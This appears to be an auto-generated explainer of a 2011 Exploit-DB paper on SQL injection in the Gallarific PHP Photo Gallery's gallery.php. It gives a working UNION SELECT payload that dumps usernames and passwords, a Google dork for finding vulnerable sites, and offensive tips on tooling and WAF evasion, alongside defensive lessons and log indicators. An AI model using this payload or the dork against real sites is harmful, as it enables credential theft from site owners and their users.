By exploitdb papers bot•January 2, 2011•
papers
Exploiting SQL Injection in Gallarific PHP Photo Gallery
Exploiting SQL Injection in Gallarific PHP Photo Gallery
What this paper is
This paper details a SQL injection vulnerability found in the gallery.php script of the Gallarific PHP Photo Gallery. The vulnerability allows an attacker to extract user credentials (username and password) from the gallarific_users table.
Simple technical breakdown
The vulnerability lies in how the gallery.php script handles the id parameter passed via the URL. It doesn't properly sanitize this input before using it in a SQL query. An attacker can inject SQL code into the id parameter to manipulate the database query. Specifically, they can use a UNION SELECT statement to combine the results of their malicious query with the original query, thereby extracting sensitive data.
Complete code and payload walkthrough
The provided exploit snippet demonstrates a classic SQL injection technique.
Exploit Snippet:
www.site.com/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6,7,8+from+gallarific_users--Let's break this down:
www.site.com/gallery.php?id=: This is the target URL and the vulnerable parameter.null: This is likely a placeholder or an initial value that would normally be used in the query.+and+1=2: This is a common technique to make the original query return no results. By making the condition1=2(which is false), the original query's results are discarded. This is crucial for theUNION SELECTto work correctly, asUNIONrequires the number of columns to match.union+select+1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6,7,8: This is the core of the attack.union select: This combines the results of the previous (now false) query with the results of this new query.1,3,4,5,6,7,8: These are placeholder values. The number of these values must match the number of columns expected by the original query thatgallery.phpwould have executed. The paper implies the original query selects 8 columns.group_concat(userid,0x3a,username,0x3a,password): This is the most important part.group_concat(): This MySQL function concatenates multiple strings into a single string. It's used here to retrieve all user records in one go.userid,0x3a,username,0x3a,password: This specifies what to concatenate.userid,username,password: These are the column names from thegallarific_userstable.0x3a: This is the hexadecimal representation of the colon character (:). It's used as a delimiter between the extracted fields.
+from+gallarific_users: This specifies the table from which to retrieve the data.--: This is a SQL comment character. It comments out any remaining part of the original query, preventing syntax errors and ensuring only our injected query is executed.
Mapping of code fragment/block to practical purpose:
www.site.com/gallery.php?id=null: Target URL and vulnerable parameter.+and+1=2: Suppress original query results to facilitateUNION SELECT.union+select+1, ..., 8: Inject a new query to retrieve data, matching the original query's column count.group_concat(userid,0x3a,username,0x3a,password): Extract and format user credentials from thegallarific_userstable.+from+gallarific_users: Specify the target table for data extraction.--: Comment out the rest of the original query to avoid syntax errors.
Payload/Shellcode:
There is no executable shellcode or payload in the traditional sense (like a reverse shell or meterpreter). The "payload" here is the crafted SQL query itself, which manipulates the database to exfiltrate data. The output of this query, when executed by the web server, will be displayed in the web browser as part of the gallery.php page's output.
Practical details for offensive operations teams
- Required Access Level: Network access to the target web server. No prior authentication to the web application is strictly required for this specific SQL injection, though authenticated access might be needed to reach the
gallery.phppage if it's restricted. - Lab Preconditions:
- A vulnerable Gallarific PHP Photo Gallery installation.
- A database backend (likely MySQL, given the
group_concatfunction) accessible by the web application. - The
gallarific_userstable must exist and contain user credentials. - The
gallery.phpscript must be accessible and process theidparameter without proper sanitization.
- Tooling Assumptions:
- A web browser for manual testing or sending requests.
- A proxy tool (like Burp Suite or OWASP ZAP) is highly recommended for intercepting, modifying, and replaying HTTP requests.
- SQL injection tools (like sqlmap) can automate the discovery and exploitation of this vulnerability, but understanding the manual process is crucial.
- Execution Pitfalls:
- Column Count Mismatch: The
union selectstatement requires the number of selected columns to match the original query. If the original query selects a different number of columns, the exploit will fail with a SQL error. This can be discovered through trial and error or by using tools that enumerate column counts. - Database Type/Version: While
group_concatis common in MySQL, syntax and functions can vary between database systems. This exploit is likely specific to MySQL. - WAF/IDS Evasion: Web Application Firewalls (WAFs) or Intrusion Detection Systems (IDS) might detect the SQL injection patterns. Evasion techniques (like encoding, using different delimiters, or obfuscating keywords) might be necessary.
- URL Encoding: Spaces and special characters in the URL must be URL-encoded (e.g., space becomes
%20). The exploit snippet uses+for spaces, which is a common form of URL encoding for spaces in query strings. - Output Filtering: The extracted data might be filtered or encoded by the web application before being displayed, making it harder to read.
- Column Count Mismatch: The
- Telemetry:
- Web Server Logs: Unusual GET requests to
gallery.phpwith long, complex query strings containing SQL keywords (union,select,group_concat,from,--). - Database Logs: Queries that deviate from normal application behavior, especially those involving
UNION SELECTand accessing thegallarific_userstable. - Application Errors: SQL syntax errors or unexpected output on the web page if the injection is not perfectly crafted.
- Web Server Logs: Unusual GET requests to
Where this was used and when
- Context: This exploit targets the Gallarific PHP Photo Gallery script, a web application designed for displaying photo galleries. The vulnerability would be exploited by an attacker targeting websites using this specific script.
- Approximate Years/Dates: The paper was published on January 2, 2011. Therefore, this vulnerability was likely discovered and potentially exploited around or before this date. It represents a common type of web vulnerability prevalent in the late 2000s and early 2010s.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is the cornerstone of preventing SQL injection. All user-supplied input, especially data used in database queries, must be rigorously validated and sanitized.
- Parameterized Queries (Prepared Statements): This is the most effective defense. Instead of concatenating user input into SQL strings, use parameterized queries where the SQL command and the data are sent separately. The database engine then treats the input strictly as data, not executable code.
- Input Whitelisting: Only allow known-good characters or patterns for specific input fields.
- Escaping Special Characters: Properly escape characters that have special meaning in SQL (e.g., single quotes, double quotes, backslashes).
- Least Privilege Principle: The database user account used by the web application should have only the minimum necessary permissions. It should not have privileges to drop tables, create new users, or access sensitive system tables if it only needs to read gallery data.
- Web Application Firewalls (WAFs): While not a silver bullet, WAFs can provide a layer of defense by detecting and blocking common SQL injection patterns. However, they can be bypassed.
- Regular Security Audits and Patching: Keep all web applications and their dependencies updated. Regularly audit code for vulnerabilities.
- Error Handling: Configure web applications to display generic error messages to users instead of detailed database error messages, which can reveal information useful to attackers.
ASCII visual (if applicable)
This vulnerability is a direct manipulation of data flow. An ASCII visual might look like this:
+-----------------+ +-----------------+ +-----------------+
| Attacker (User) |----->| Web Server |----->| Database Server |
+-----------------+ | (gallery.php) | | (gallarific_users)|
+-------+---------+ +-----------------+
|
| (Vulnerable 'id' parameter)
|
+-------v---------+
| Malicious SQL |
| Injection |
+-----------------+
|
| (Data Exfiltration)
|
+-------v---------+
| Sensitive Data |
| (Usernames, |
| Passwords) |
+-----------------+Source references
- Paper Title: GALLARIFIC PHP Photo Gallery Script - 'gallery.php' SQL Injection
- Author: AtT4CKxT3rR0r1ST
- Published: 2011-01-02
- Exploit-DB Paper ID: 15891
- URL: https://www.exploit-db.com/papers/15891
Original Exploit-DB Content (Verbatim)
GALLARIFIC PHP Photo Gallery Script (gallery.php) Sql Injection Vulnerability
=================================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.gallarific.com/download.php
.:. Dork : inurl:"/gadmin/index.php"
####################################################################
===[ Exploit ]===
www.site.com/gallery.php?id=null[Sql Injection]
www.site.com/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6,7,8+from+gallarific_users--
===[ Admin Panel ]===
www.site.com/gadmin/index.php
####################################################################